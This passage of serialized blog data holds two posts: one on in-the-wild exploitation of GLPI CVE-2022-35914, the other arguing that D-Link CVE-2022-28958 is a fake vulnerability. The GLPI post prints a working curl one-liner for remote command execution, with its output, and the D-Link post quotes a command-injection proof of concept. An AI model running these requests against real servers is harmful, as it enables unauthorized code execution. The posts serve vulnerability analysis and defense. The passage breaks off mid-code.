ignorant.",[18,112351,112352],{},"A proof of concept exploit was published to GitHub a little more than two weeks after the GLPI security patch was issued. That was rapidly followed by a full disclosure blog and, a few days later, GLPI announced “massive” exploitation in the wild. While not ideal, that's about as good a timeline defenders can reasonably expect for such a straightforward vulnerability. Ultimately, defenders had 18 days to patch before a full disclosure blog was released.",[18,112354,112355,112356,112359],{},"Researcher and attacker interest continued through October. Shadowserver tweeted about active exploitation in the middle of the month, and a Metasploit module was merged into the master branch in late October. In November a simple curl-based one-line proof of concept was published. This is worth noting because other proof of concepts were complicated by scraping a valid ",[886,112357,112358],{},"sid",", when any old value would do.",[100588,112361,112362],{},[1354,112363,112365],{"className":31740,"code":112364,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http:\u002F\u002F10.12.70.206\u002Fglpi\u002Fvendor\u002Fhtmlawed\u002Fhtmlawed\u002FhtmLawedTest.php | egrep '\\  \\[[0-9]+\\] =\\>'| sed -E 's\u002F\\  \\[[0-9]+\\] =\\> (.*)\u003Cbr \\\u002F>\u002F\\1\u002F'\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n",[886,112366,112367,112424],{"__ignoreMap":219},[1373,112368,112369,112371,112373,112375,112377,112379,112382,112384,112387,112389,112392,112394,112397,112399,112402,112404,112407,112409,112411,112414,112417,112419,112422],{"class":1375,"line":1376},[1373,112370,55482],{"class":2206},[1373,112372,2222],{"class":1391},[1373,112374,2239],{"class":2209},[1373,112376,87473],{"class":2209},[1373,112378,4713],{"class":1387},[1373,112380,112381],{"class":1391},"sid=foo&hhook=exec&text=id",[1373,112383,1388],{"class":1387},[1373,112385,112386],{"class":2209}," -b",[1373,112388,4713],{"class":1387},[1373,112390,112391],{"class":1391},"sid=foo",[1373,112393,1388],{"class":1387},[1373,112395,112396],{"class":1391}," http:\u002F\u002F10.12.70.206\u002Fglpi\u002Fvendor\u002Fhtmlawed\u002Fhtmlawed\u002FhtmLawedTest.php",[1373,112398,2233],{"class":1397},[1373,112400,112401],{"class":2206}," egrep",[1373,112403,4713],{"class":1387},[1373,112405,112406],{"class":1391},"\\  \\[[0-9]+\\] =\\>",[1373,112408,1388],{"class":1387},[1373,112410,17472],{"class":1397},[1373,112412,112413],{"class":2206}," sed",[1373,112415,112416],{"class":2209}," -E",[1373,112418,4713],{"class":1387},[1373,112420,112421],{"class":1391},"s\u002F\\  \\[[0-9]+\\] =\\> (.*)\u003Cbr \\\u002F>\u002F\\1\u002F",[1373,112423,76063],{"class":1387},[1373,112425,112426,112428,112430,112432,112434,112436,112438,112440,112442,112444,112446,112448,112450,112452,112454,112456,112458,112460],{"class":1375,"line":220},[1373,112427,75926],{"class":4640},[1373,112429,5417],{"class":1397},[1373,112431,58821],{"class":1391},[1373,112433,1384],{"class":1383},[1373,112435,105613],{"class":2206},[1373,112437,2230],{"class":1383},[1373,112439,75941],{"class":4640},[1373,112441,5417],{"class":1397},[1373,112443,58821],{"class":1391},[1373,112445,1384],{"class":1383},[1373,112447,105613],{"class":2206},[1373,112449,2230],{"class":1383},[1373,112451,75954],{"class":4640},[1373,112453,5417],{"class":1397},[1373,112455,58821],{"class":1391},[1373,112457,1384],{"class":1383},[1373,112459,105613],{"class":2206},[1373,112461,11875],{"class":1383},[18,112463,112464],{},"Finally, as recently as December a “mass scanner” was advertised on Twitter. Although the asking price of $10 seems suspect. But regardless, the timeline and Shodan chart depicting a drop off after September 2022 compliment each other. GLPI instances appear to have been removed from the internet as exploitation ramped up. GLPI’s announcement and ShadowServer’s tweet about exploitation in the wild leave little doubt that CVE-2022-35914 has been exploited in the wild.",[1920,112466,41953],{"id":112467},"active-exploitation",[18,112469,112470,112471,112475],{},"A couple of months have passed since GLPI and ShadowServer shared their observations regarding active exploitation of CVE-2022-35914. We think it’s useful to know if the vulnerability is still under active exploitation. There are two sources that can help us quickly answer that question. First, ShadowServer maintains a useful ",[47,112472,112474],{"href":106820,"rel":112473},[51],"honeypot dashboard"," that lists all the vulnerabilities they’ve seen exploited recently. While not hugely exploited, we can see CVE-2022-35914 exploitation attempts remain ongoing.",[18,112477,112478],{},[68,112479],{":width":10862,"alt":112480,"src":112481},"shadowserver","\u002Fblog\u002Fglpi-exploitation\u002Fshadowserver-cve-2022-35914.png",[18,112483,112484,112485,112489,112490,112493,112494,59],{},"The other source we can turn to is GreyNoise. GreyNoise doesn’t have a ",[47,112486,55284],{"href":112487,"rel":112488},"https:\u002F\u002Fviz.greynoise.io\u002Fcheat-sheet\u002Ftags",[51]," for CVE-2022-35914, but we can query the API to get a list of malicious IP addresses attempting to reach the ",[886,112491,112492],{},"htmlLawedTest.php"," file containing the ",[47,112495,112498],{"href":112496,"rel":112497},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=raw_data.web.paths%3A%22htmlawed%2Fhtmlawed%2FhtmLawedTest.php%22%20classification%3Amalicious",[51],"exploited debug functionality",[18,112500,112501],{},[68,112502],{":width":10862,"alt":112503,"src":112504},"greynoise","\u002Fblog\u002Fglpi-exploitation\u002Fglpi-greynoise.png",[18,112506,112507,112508,112513,112514,112516,112517,112520],{},"Both ShadowServer and GreyNoise indicate that exploitation attempts in the wild are ongoing. But are there still vulnerable hosts on the internet to exploit? To answer that question, we scanned the GLPI hosts that Shodan has indexed. The ",[47,112509,112512],{"href":112510,"rel":112511},"https:\u002F\u002Fgithub.com\u002Fglpi-project\u002Fglpi\u002Fcommit\u002F5f5c60280b0577392d722662461638b961f2742",[51],"fix"," for CVE-2022-39514 was to remove ",[886,112515,112492],{}," from GLPI, as is was for test purposes only. Determining if a host is vulnerable is as simple as seeing if they still have ",[886,112518,112519],{},"htmLawedTest.php"," or not. We found only ~10% of internet-facing GLPI servers are currently vulnerable.",[1925,112522,112523],{},[18,112524,112525],{},"Internet-facing GLPI Servers Affected by CVE-2022-3914",[78559,112527],{":labels":112528,":values":112529},"[\"Vulnerable\",\"Not Vulnerable\"]","[9.9,90.1]",[18,112531,112532,112533,112538],{},"Of course, the fact that there are hundreds of exploitable GLPI hosts is likely still interesting to attackers. The software is likely associated with a business and critical data. In fact, the software reminds us of Zoho ManageEngine Service Desk Plus that was extensively exploited by ",[47,112534,112537],{"href":112535,"rel":112536},"https:\u002F\u002Fwww.cisa.gov\u002Fuscert\u002Fncas\u002Falerts\u002Faa21-336a",[51],"APT"," in 2021.",[1920,112540,1903],{"id":1902},[18,112542,112543],{},"Prioritizing the remediation of vulnerabilities exploited in the wild is a solid vulnerability management strategy. But relying on a single source of information with an incomplete dataset could result in disaster. In this blog, we presented a vulnerability in crucial business software that has been exploited in the wild, but hasn’t been included in the CISA KEV Catalog. This is just one example of an overlooked vulnerability. There are many others, and we’ll visit more in the future.",[18,112545,112546,112547,95208],{},"For more information on vulnerabilities exploited in the wild, but not in CISA KEV, register for a VulnCheck account today by loading ",[47,112548,78319],{"href":78319,"rel":112549},[51],[2901,112551,112552],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":112554},[],"2022-12-21","Taking a look at the timeline leading up to exploitation of CVE-2022-35914 and the current state of attacks in the wild.",{"slug":112558},"glpi-exploitation","\u002Fblog\u002Fglpi-exploitation",{"title":112222,"description":112556},"blog\u002Fglpi-exploitation",[242,23275],"zXey5154tM1NiMq5VPq540Qv1sHdqUMFqT69Oj_9Wps",{"id":112565,"title":112566,"articles":112567,"authors":112575,"body":112577,"date":62139,"description":115660,"extension":234,"image":7,"link":7,"meta":115661,"navigation":237,"path":115664,"seo":115665,"series":7,"stem":115666,"subtype":7,"tags":7,"__hash__":115667},"blog\u002Fblog\u002Fmoobot-uses-fake-vulnerability.md","Moobot Uses a Fake Vulnerability",[112568,112572],{"title":112569,"source":3494,"link":112570,"date":112571},"Risky Biz News: Disgruntled member doxes and extorts URSNIF gang","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-disgruntled-member","2022-12-11",{"title":112573,"source":3481,"link":112574,"date":61897},"A year on, CISA realizes debunked vuln actually a dud and removes it from must-patch list","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F12\u002F06\u002Fdud_cve_removed\u002F",[112576],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":112578,"toc":115658},[112579,112581,112604,112625,112653,112677,112685,112694,112698,112707,112712,112718,112976,112982,112987,113005,113028,113064,113597,113604,113609,113628,113653,113659,113663,113671,113676,113679,113703,113754,113761,113785,113869,113872,113875,113899,113947,113959,114009,114023,114047,114142,114154,114178,114270,114276,114280,114289,114314,114341,114383,114403,114467,114485,114491,114494,114498,114511,114756,114759,114784,115232,115239,115369,115381,115406,115482,115498,115502,115508,115513,115524,115529,115535,115537,115540,115560,115563,115568,115572,115579,115655],[1920,112580,11648],{"id":11647},[18,112582,112583,112584,112589,112590,112593,112594,112598,112599,112603],{},"On September 8, 2022, ",[47,112585,112588],{"href":112586,"rel":112587},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-28958",[51],"CVE-2022-28958"," was added to CISA's ",[47,112591,10993],{"href":2864,"rel":112592},[51],". A ",[47,112595,5061],{"href":112596,"rel":112597},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fmoobot-d-link-devices\u002F",[51]," published a couple days prior said the vulnerability was being exploited by ",[47,112600,24605],{"href":112601,"rel":112602},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.moobot",[51],", a Mirai-like botnet. However, this vulnerability has never been exploited in the wild, because CVE-2022-28958 isn’t a real vulnerability.",[18,112605,112606,112607,112612,112613,112618,112619,112624],{},"On April 6, 2022, GitHub user ",[47,112608,112611],{"href":112609,"rel":112610},"https:\u002F\u002Fgithub.com\u002Fshijin0925",[51],"shijn0925"," published ",[47,112614,112617],{"href":112615,"rel":112616},"https:\u002F\u002Fgithub.com\u002Fshijin0925\u002FIOT\u002Ftree\u002Fmaster\u002FDIR816",[51],"four vulnerabilities"," affecting the end-of-life SOHO router D-Link ",[47,112620,112623],{"href":112621,"rel":112622},"https:\u002F\u002Flegacy.us.dlink.com\u002Fpages\u002Fproduct.aspx?id=1e9adeae036d4724b5fbc82325f93ae8",[51],"DIR-816L",". The vulnerability details were published in markdown files named 1.md through 4.md. MITRE assigned the following CVE identifiers for the researcher’s findings:",[22,112626,112627,112635,112638,112645],{},[25,112628,112629,112630],{},"1.md - ",[47,112631,112634],{"href":112632,"rel":112633},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28955",[51],"CVE-2022-28955",[25,112636,112637],{},"2.md - None assigned",[25,112639,112640,112641],{},"3.md - ",[47,112642,112588],{"href":112643,"rel":112644},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28958",[51],[25,112646,112647,112648],{},"4.md - ",[47,112649,112652],{"href":112650,"rel":112651},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28956",[51],"CVE-2022-28956",[18,112654,112655,112656,1246,112661,1246,112666,1255,112671,112676],{},"This blog is predominantly about CVE-2022-28958 not being a real vulnerability, but it’s interesting to note that the other two findings likely shouldn’t have received CVE either. CVE-2022-28955 (missing authentication) appears to be as-designed functionality with low or no security impact. CVE-2022-28956 (authentication bypass) is a real security issue, but a duplicate of four other CVE: ",[47,112657,112660],{"href":112658,"rel":112659},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-15894",[51],"CVE-2020-15894",[47,112662,112665],{"href":112663,"rel":112664},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-9376",[51],"CVE-2020-9376",[47,112667,112670],{"href":112668,"rel":112669},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2019-17506",[51],"CVE-2019-17506",[47,112672,112675],{"href":112673,"rel":112674},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2018-7034",[51],"CVE-2018-7034",". Amazingly, we found those five CVE don’t cover all affected devices. The authentication bypass is useful to us later in the blog, so we ended up creating a list of affected devices (see addendum at the end of the blog).",[18,112678,112679,112680,112684],{},"All of this is worth discussing, not just because CVE-2022-28958 found its way into the KEV Catalog, but because there are a good number of these devices on the internet. ",[47,112681,41731],{"href":112682,"rel":112683},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22D-LINK+SYSTEMS%2C+INC.%22+title%3A%22WIRELESS+ROUTER%22+title%3A%22HOME%22",[51]," has indexed around 6,000 of them:",[18,112686,112687,112691,112693],{},[68,112688],{":width":10862,"alt":112689,"src":112690},"censys","\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fshodan.png",[1823,112692],{},"\n ",[1920,112695,112697],{"id":112696},"moobot-and-cve-2022-28958","Moobot and CVE-2022-28958",[18,112699,112700,112701,112706],{},"Let's look at shijin0925's original ",[47,112702,112705],{"href":112703,"rel":112704},"https:\u002F\u002Fgithub.com\u002Fshijin0925\u002FIOT\u002Fblob\u002Fmaster\u002FDIR816\u002F3.md",[51],"disclosure",". The following vulnerability description is provided (note that we didn't correct any language):",[1925,112708,112709],{},[18,112710,112711],{},"DIR816L_FW206b01 shareport.php has an issue that attackers can use it to execute command via \"value\" parameter.",[18,112713,112714,112715,4606],{},"The disclosure also includes this code snippet from ",[886,112716,112717],{},"shareport.php",[1354,112719,112721],{"className":1367,"code":112720,"language":1369,"meta":219,"style":219},"if ($AUTHORIZED_GROUP \u003C 0)\n{\n $result = \"FAIL\";\n $reason = i18n(\"Permission deny. The user is unauthorized.\");\n}\nelse\n{\n if ($_POST[\"action\"] == \"sethostname\")\n {\n $value = $_POST[\"value\"];\n if ($value != \"\")\n {\n set(\"\u002Fdevice\u002Fgw_name\", $value);\n event(\"SHAREPORT.SETGWNAME\");\n $RESULT = \"OK\";\n $REASON = \"\"; \n }\n } \n else fail(i18n(\"Unknown ACTION!\"));\n}\n",[886,112722,112723,112738,112742,112759,112782,112786,112791,112795,112824,112828,112850,112864,112868,112890,112906,112924,112939,112943,112949,112972],{"__ignoreMap":219},[1373,112724,112725,112727,112729,112732,112734,112736],{"class":1375,"line":1376},[1373,112726,4637],{"class":4636},[1373,112728,47425],{"class":1383},[1373,112730,112731],{"class":4640},"AUTHORIZED_GROUP ",[1373,112733,11852],{"class":1397},[1373,112735,5557],{"class":5467},[1373,112737,11875],{"class":1383},[1373,112739,112740],{"class":1375,"line":220},[1373,112741,8904],{"class":1383},[1373,112743,112744,112746,112748,112750,112752,112755,112757],{"class":1375,"line":1266},[1373,112745,7362],{"class":1383},[1373,112747,100518],{"class":4640},[1373,112749,5417],{"class":1397},[1373,112751,4883],{"class":1387},[1373,112753,112754],{"class":1391},"FAIL",[1373,112756,183],{"class":1387},[1373,112758,4912],{"class":1383},[1373,112760,112761,112763,112766,112768,112771,112773,112775,112778,112780],{"class":1375,"line":1852},[1373,112762,7362],{"class":1383},[1373,112764,112765],{"class":4640},"reason ",[1373,112767,5417],{"class":1397},[1373,112769,112770],{"class":7297}," i18n",[1373,112772,1384],{"class":1383},[1373,112774,183],{"class":1387},[1373,112776,112777],{"class":1391},"Permission deny. The user is unauthorized.",[1373,112779,183],{"class":1387},[1373,112781,4680],{"class":1383},[1373,112783,112784],{"class":1375,"line":4692},[1373,112785,1855],{"class":1383},[1373,112787,112788],{"class":1375,"line":4724},[1373,112789,112790],{"class":4636},"else\n",[1373,112792,112793],{"class":1375,"line":4756},[1373,112794,8904],{"class":1383},[1373,112796,112797,112799,112801,112803,112805,112807,112809,112811,112813,112815,112817,112820,112822],{"class":1375,"line":4768},[1373,112798,4695],{"class":4636},[1373,112800,47425],{"class":1383},[1373,112802,100083],{"class":4640},[1373,112804,7035],{"class":1383},[1373,112806,183],{"class":1387},[1373,112808,100044],{"class":1391},[1373,112810,183],{"class":1387},[1373,112812,15050],{"class":1383},[1373,112814,16406],{"class":1397},[1373,112816,4883],{"class":1387},[1373,112818,112819],{"class":1391},"sethostname",[1373,112821,183],{"class":1387},[1373,112823,11875],{"class":1383},[1373,112825,112826],{"class":1375,"line":4792},[1373,112827,9613],{"class":1383},[1373,112829,112830,112832,112834,112836,112838,112840,112842,112844,112846,112848],{"class":1375,"line":4798},[1373,112831,4727],{"class":1383},[1373,112833,100300],{"class":4640},[1373,112835,5417],{"class":1397},[1373,112837,4656],{"class":1383},[1373,112839,100083],{"class":4640},[1373,112841,7035],{"class":1383},[1373,112843,183],{"class":1387},[1373,112845,85021],{"class":1391},[1373,112847,183],{"class":1387},[1373,112849,34699],{"class":1383},[1373,112851,112852,112854,112856,112858,112860,112862],{"class":1375,"line":4806},[1373,112853,9773],{"class":4636},[1373,112855,47425],{"class":1383},[1373,112857,100300],{"class":4640},[1373,112859,15677],{"class":1397},[1373,112861,16579],{"class":1387},[1373,112863,11875],{"class":1383},[1373,112865,112866],{"class":1375,"line":4817},[1373,112867,9788],{"class":1383},[1373,112869,112870,112873,112875,112877,112880,112882,112884,112886,112888],{"class":1375,"line":4825},[1373,112871,112872],{"class":7297}," set",[1373,112874,1384],{"class":1383},[1373,112876,183],{"class":1387},[1373,112878,112879],{"class":1391},"\u002Fdevice\u002Fgw_name",[1373,112881,183],{"class":1387},[1373,112883,5437],{"class":1383},[1373,112885,4656],{"class":1383},[1373,112887,85021],{"class":4640},[1373,112889,4680],{"class":1383},[1373,112891,112892,112895,112897,112899,112902,112904],{"class":1375,"line":4835},[1373,112893,112894],{"class":7297}," event",[1373,112896,1384],{"class":1383},[1373,112898,183],{"class":1387},[1373,112900,112901],{"class":1391},"SHAREPORT.SETGWNAME",[1373,112903,183],{"class":1387},[1373,112905,4680],{"class":1383},[1373,112907,112908,112910,112913,112915,112917,112920,112922],{"class":1375,"line":4843},[1373,112909,47435],{"class":1383},[1373,112911,112912],{"class":4640},"RESULT ",[1373,112914,5417],{"class":1397},[1373,112916,4883],{"class":1387},[1373,112918,112919],{"class":1391},"OK",[1373,112921,183],{"class":1387},[1373,112923,4912],{"class":1383},[1373,112925,112926,112928,112931,112933,112935,112937],{"class":1375,"line":4849},[1373,112927,47435],{"class":1383},[1373,112929,112930],{"class":4640},"REASON ",[1373,112932,5417],{"class":1397},[1373,112934,16579],{"class":1387},[1373,112936,39663],{"class":1383},[1373,112938,108366],{"class":4640},[1373,112940,112941],{"class":1375,"line":4877},[1373,112942,9861],{"class":1383},[1373,112944,112945,112947],{"class":1375,"line":4915},[1373,112946,28032],{"class":1383},[1373,112948,47181],{"class":4640},[1373,112950,112951,112953,112956,112958,112961,112963,112965,112968,112970],{"class":1375,"line":4931},[1373,112952,7643],{"class":4636},[1373,112954,112955],{"class":7297}," fail",[1373,112957,1384],{"class":1383},[1373,112959,112960],{"class":7297},"i18n",[1373,112962,1384],{"class":1383},[1373,112964,183],{"class":1387},[1373,112966,112967],{"class":1391},"Unknown ACTION!",[1373,112969,183],{"class":1387},[1373,112971,1413],{"class":1383},[1373,112973,112974],{"class":1375,"line":4947},[1373,112975,1855],{"class":1383},[18,112977,112978,112979,4606],{},"And the disclosure specifically calls out the use of ",[886,112980,112981],{},"set()",[1925,112983,112984],{},[18,112985,112986],{},"As you can see there is not enough filter with paramter \"value\",it just passed to function set which execute command directly.",[18,112988,112989,112990,112993,112994,50864,112996,112998,112999,113001,113002,113004],{},"According to this disclosure, the vulnerability is the result of an attacker-controlled ",[886,112991,112992],{},"$value"," being passed into ",[886,112995,112981],{},[886,112997,112717],{},". Allegedly, ",[886,113000,112981],{}," will \"execute command directly.\" The disclosure also contains a ",[886,113003,1557],{},"-based proof of concept:",[100588,113006,113007],{},[1354,113008,113010],{"className":31740,"code":113009,"language":2186,"meta":219,"style":219},"curl http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php -d \"action=sethostname&value=%26%20ls%20-la%20%26%0aAUTHORIZED_GROUP=1\"\n",[886,113011,113012],{"__ignoreMap":219},[1373,113013,113014,113016,113019,113021,113023,113026],{"class":1375,"line":1376},[1373,113015,1557],{"class":2206},[1373,113017,113018],{"class":1391}," http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php",[1373,113020,87473],{"class":2209},[1373,113022,23732],{"class":1387},[1373,113024,113025],{"class":1391},"action=sethostname&value=%26%20ls%20-la%20%26%0aAUTHORIZED_GROUP=1",[1373,113027,19057],{"class":1387},[18,113029,113030,113031,113033,113034,113036,113037,113040,113041,113043,113044,113047,113048,113050,113051,10515,113053,10515,113055,113057,113058,113061,113062,4606],{},"The disclosure doesn’t contain the output of the ",[886,113032,1557],{}," request, and it doesn't provide any other evidence the router executed the provided ",[886,113035,85021],{}," parameter (",[886,113038,113039],{},"& ls -la &","). The reader is just expected to accept the command works. But, the proof of concept has a glaring error. It doesn’t send the “malicious” request to ",[886,113042,112717],{}," where the alleged vulnerable code resides. The request is sent to ",[886,113045,113046],{},"getcfg.php"," an entirely different and unrelated endpoint. And, perhaps most importantly, ",[886,113049,113046],{}," doesn't have logic for handling the provided ",[886,113052,100044],{},[1131,113054,4536],{},[886,113056,85021],{}," parameters, so this proof of concept would have ",[1131,113059,113060],{},"no effect"," on the system. But don’t take our word for it. Here is ",[886,113063,113046],{},[1354,113065,113067],{"className":1367,"code":113066,"language":1369,"meta":219,"style":219},"if ($_POST[\"CACHE\"] == \"true\")\n{\n echo dump(1, \"\u002Fruntime\u002Fsession\u002F\".$SESSION_UID.\"\u002Fpostxml\");\n}\nelse\n{\n if($AUTHORIZED_GROUP \u003C 0)\n {\n \u002F* not a power user, return error message *\u002F\n echo \"\\t\u003Cresult>FAILED\u003C\u002Fresult>\\n\";\n echo \"\\t\u003Cmessage>Not authorized\u003C\u002Fmessage>\\n\";\n }\n else\n {\n \u002F* cut_count() will return 0 when no or only one token. *\u002F\n $SERVICE_COUNT = cut_count($_POST[\"SERVICES\"], \",\");\n TRACE_debug(\"GETCFG: got \".$SERVICE_COUNT.\" service(s): \".$_POST[\"SERVICES\"]);\n $SERVICE_INDEX = 0;\n while ($SERVICE_INDEX \u003C $SERVICE_COUNT)\n {\n $GETCFG_SVC = cut($_POST[\"SERVICES\"], $SERVICE_INDEX, \",\");\n TRACE_debug(\"GETCFG: serivce[\".$SERVICE_INDEX.\"] = \".$GETCFG_SVC);\n if ($GETCFG_SVC!=\"\")\n {\n $file = \"\u002Fhtdocs\u002Fwebinc\u002Fgetcfg\u002F\".$GETCFG_SVC.\".xml.php\";\n \u002F* GETCFG_SVC will be passed to the child process. *\u002F\n if (isfile($file)==\"1\")\n {\n AES_Encrypt_DBnode($GETCFG_SVC, \"Encrypt\");\n dophp(\"load\", $file);\n AES_Encrypt_DBnode($GETCFG_SVC, \"Decrypt\");\n }\n }\n $SERVICE_INDEX++;\n }\n }\n}\n",[886,113068,113069,113098,113102,113140,113144,113148,113152,113166,113170,113175,113194,113211,113215,113220,113224,113229,113264,113310,113323,113340,113344,113385,113423,113437,113441,113473,113478,113503,113507,113527,113548,113567,113571,113575,113585,113589,113593],{"__ignoreMap":219},[1373,113070,113071,113073,113075,113077,113079,113081,113084,113086,113088,113090,113092,113094,113096],{"class":1375,"line":1376},[1373,113072,4637],{"class":4636},[1373,113074,47425],{"class":1383},[1373,113076,100083],{"class":4640},[1373,113078,7035],{"class":1383},[1373,113080,183],{"class":1387},[1373,113082,113083],{"class":1391},"CACHE",[1373,113085,183],{"class":1387},[1373,113087,15050],{"class":1383},[1373,113089,16406],{"class":1397},[1373,113091,4883],{"class":1387},[1373,113093,10874],{"class":1391},[1373,113095,183],{"class":1387},[1373,113097,11875],{"class":1383},[1373,113099,113100],{"class":1375,"line":220},[1373,113101,8904],{"class":1383},[1373,113103,113104,113106,113109,113111,113113,113115,113117,113120,113122,113124,113126,113129,113131,113133,113136,113138],{"class":1375,"line":1266},[1373,113105,94772],{"class":1379},[1373,113107,113108],{"class":7297}," dump",[1373,113110,1384],{"class":1383},[1373,113112,467],{"class":5467},[1373,113114,5437],{"class":1383},[1373,113116,4883],{"class":1387},[1373,113118,113119],{"class":1391},"\u002Fruntime\u002Fsession\u002F",[1373,113121,183],{"class":1387},[1373,113123,59],{"class":1397},[1373,113125,4644],{"class":1383},[1373,113127,113128],{"class":4640},"SESSION_UID",[1373,113130,59],{"class":1397},[1373,113132,183],{"class":1387},[1373,113134,113135],{"class":1391},"\u002Fpostxml",[1373,113137,183],{"class":1387},[1373,113139,4680],{"class":1383},[1373,113141,113142],{"class":1375,"line":1852},[1373,113143,1855],{"class":1383},[1373,113145,113146],{"class":1375,"line":4692},[1373,113147,112790],{"class":4636},[1373,113149,113150],{"class":1375,"line":4724},[1373,113151,8904],{"class":1383},[1373,113153,113154,113156,113158,113160,113162,113164],{"class":1375,"line":4756},[1373,113155,4695],{"class":4636},[1373,113157,34467],{"class":1383},[1373,113159,112731],{"class":4640},[1373,113161,11852],{"class":1397},[1373,113163,5557],{"class":5467},[1373,113165,11875],{"class":1383},[1373,113167,113168],{"class":1375,"line":4768},[1373,113169,9613],{"class":1383},[1373,113171,113172],{"class":1375,"line":4792},[1373,113173,113174],{"class":4630}," \u002F* not a power user, return error message *\u002F\n",[1373,113176,113177,113180,113182,113185,113188,113190,113192],{"class":1375,"line":4798},[1373,113178,113179],{"class":1379}," echo",[1373,113181,4883],{"class":1387},[1373,113183,113184],{"class":2326},"\\t",[1373,113186,113187],{"class":1391},"\u003Cresult>FAILED\u003C\u002Fresult>",[1373,113189,8943],{"class":2326},[1373,113191,183],{"class":1387},[1373,113193,4912],{"class":1383},[1373,113195,113196,113198,113200,113202,113205,113207,113209],{"class":1375,"line":4806},[1373,113197,113179],{"class":1379},[1373,113199,4883],{"class":1387},[1373,113201,113184],{"class":2326},[1373,113203,113204],{"class":1391},"\u003Cmessage>Not authorized\u003C\u002Fmessage>",[1373,113206,8943],{"class":2326},[1373,113208,183],{"class":1387},[1373,113210,4912],{"class":1383},[1373,113212,113213],{"class":1375,"line":4817},[1373,113214,4795],{"class":1383},[1373,113216,113217],{"class":1375,"line":4825},[1373,113218,113219],{"class":4636}," else\n",[1373,113221,113222],{"class":1375,"line":4835},[1373,113223,9613],{"class":1383},[1373,113225,113226],{"class":1375,"line":4843},[1373,113227,113228],{"class":4630}," \u002F* cut_count() will return 0 when no or only one token. *\u002F\n",[1373,113230,113231,113233,113236,113238,113241,113243,113245,113247,113249,113252,113254,113256,113258,113260,113262],{"class":1375,"line":4849},[1373,113232,4727],{"class":1383},[1373,113234,113235],{"class":4640},"SERVICE_COUNT ",[1373,113237,5417],{"class":1397},[1373,113239,113240],{"class":7297}," 